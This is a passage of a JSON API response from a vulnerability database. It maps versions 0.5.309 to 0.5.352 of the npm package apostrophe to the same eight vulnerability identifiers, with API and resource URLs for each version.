D-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.309"},{"url":"http://public2.vulnerablecode.io/api/packages/268393?format=json","purl":"pkg:npm/apostrophe@0.5.310","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.310"},{"url":"http://public2.vulnerablecode.io/api/packages/268394?format=json","purl":"pkg:npm/apostrophe@0.5.311","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.311"},{"url":"http://public2.vulnerablecode.io/api/packages/268395?format=json","purl":"pkg:npm/apostrophe@0.5.312","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.312"},{"url":"http://public2.vulnerablecode.io/api/packages/268396?format=json","purl":"pkg:npm/apostrophe@0.5.313","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.313"},{"url":"http://public2.vulnerablecode.io/api/packages/268397?format=json","purl":"pkg:npm/apostrophe@0.5.314","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.314"},{"url":"http://public2.vulnerablecode.io/api/packages/268398?format=json","purl":"pkg:npm/apostrophe@0.5.315","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.315"},{"url":"http://public2.vulnerablecode.io/api/packages/268399?format=json","purl":"pkg:npm/apostrophe@0.5.316","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.316"},{"url":"http://public2.vulnerablecode.io/api/packages/268400?format=json","purl":"pkg:npm/apostrophe@0.5.317","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.317"},{"url":"http://public2.vulnerablecode.io/api/packages/268401?format=json","purl":"pkg:npm/apostrophe@0.5.318","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.318"},{"url":"http://public2.vulnerablecode.io/api/packages/268402?format=json","purl":"pkg:npm/apostrophe@0.5.319","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.319"},{"url":"http://public2.vulnerablecode.io/api/packages/268403?format=json","purl":"pkg:npm/apostrophe@0.5.320","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.320"},{"url":"http://public2.vulnerablecode.io/api/packages/268404?format=json","purl":"pkg:npm/apostrophe@0.5.321","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.321"},{"url":"http://public2.vulnerablecode.io/api/packages/268405?format=json","purl":"pkg:npm/apostrophe@0.5.322","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.322"},{"url":"http://public2.vulnerablecode.io/api/packages/268406?format=json","purl":"pkg:npm/apostrophe@0.5.323","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.323"},{"url":"http://public2.vulnerablecode.io/api/packages/268407?format=json","purl":"pkg:npm/apostrophe@0.5.324","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.324"},{"url":"http://public2.vulnerablecode.io/api/packages/268408?format=json","purl":"pkg:npm/apostrophe@0.5.325","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.325"},{"url":"http://public2.vulnerablecode.io/api/packages/268409?format=json","purl":"pkg:npm/apostrophe@0.5.326","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.326"},{"url":"http://public2.vulnerablecode.io/api/packages/268410?format=json","purl":"pkg:npm/apostrophe@0.5.327","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.327"},{"url":"http://public2.vulnerablecode.io/api/packages/268411?format=json","purl":"pkg:npm/apostrophe@0.5.328","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.328"},{"url":"http://public2.vulnerablecode.io/api/packages/268412?format=json","purl":"pkg:npm/apostrophe@0.5.329","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.329"},{"url":"http://public2.vulnerablecode.io/api/packages/268413?format=json","purl":"pkg:npm/apostrophe@0.5.330","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.330"},{"url":"http://public2.vulnerablecode.io/api/packages/268414?format=json","purl":"pkg:npm/apostrophe@0.5.331","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.331"},{"url":"http://public2.vulnerablecode.io/api/packages/268415?format=json","purl":"pkg:npm/apostrophe@0.5.332","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.332"},{"url":"http://public2.vulnerablecode.io/api/packages/268416?format=json","purl":"pkg:npm/apostrophe@0.5.333","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.333"},{"url":"http://public2.vulnerablecode.io/api/packages/268417?format=json","purl":"pkg:npm/apostrophe@0.5.334","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.334"},{"url":"http://public2.vulnerablecode.io/api/packages/268418?format=json","purl":"pkg:npm/apostrophe@0.5.335","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.335"},{"url":"http://public2.vulnerablecode.io/api/packages/268419?format=json","purl":"pkg:npm/apostrophe@0.5.336","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.336"},{"url":"http://public2.vulnerablecode.io/api/packages/268420?format=json","purl":"pkg:npm/apostrophe@0.5.337","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.337"},{"url":"http://public2.vulnerablecode.io/api/packages/268421?format=json","purl":"pkg:npm/apostrophe@0.5.338","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.338"},{"url":"http://public2.vulnerablecode.io/api/packages/268422?format=json","purl":"pkg:npm/apostrophe@0.5.339","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.339"},{"url":"http://public2.vulnerablecode.io/api/packages/268423?format=json","purl":"pkg:npm/apostrophe@0.5.340","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.340"},{"url":"http://public2.vulnerablecode.io/api/packages/268424?format=json","purl":"pkg:npm/apostrophe@0.5.341","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.341"},{"url":"http://public2.vulnerablecode.io/api/packages/268425?format=json","purl":"pkg:npm/apostrophe@0.5.342","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.342"},{"url":"http://public2.vulnerablecode.io/api/packages/268426?format=json","purl":"pkg:npm/apostrophe@0.5.343","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.343"},{"url":"http://public2.vulnerablecode.io/api/packages/268427?format=json","purl":"pkg:npm/apostrophe@0.5.344","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.344"},{"url":"http://public2.vulnerablecode.io/api/packages/268428?format=json","purl":"pkg:npm/apostrophe@0.5.345","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.345"},{"url":"http://public2.vulnerablecode.io/api/packages/268429?format=json","purl":"pkg:npm/apostrophe@0.5.346","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.346"},{"url":"http://public2.vulnerablecode.io/api/packages/268430?format=json","purl":"pkg:npm/apostrophe@0.5.347","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.347"},{"url":"http://public2.vulnerablecode.io/api/packages/268431?format=json","purl":"pkg:npm/apostrophe@0.5.348","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.348"},{"url":"http://public2.vulnerablecode.io/api/packages/268432?format=json","purl":"pkg:npm/apostrophe@0.5.349","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.349"},{"url":"http://public2.vulnerablecode.io/api/packages/268433?format=json","purl":"pkg:npm/apostrophe@0.5.350","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.350"},{"url":"http://public2.vulnerablecode.io/api/packages/268434?format=json","purl":"pkg:npm/apostrophe@0.5.351","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.351"},{"url":"http://public2.vulnerablecode.io/api/packages/268435?format=json","purl":"pkg:npm/apostrophe@0.5.352","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/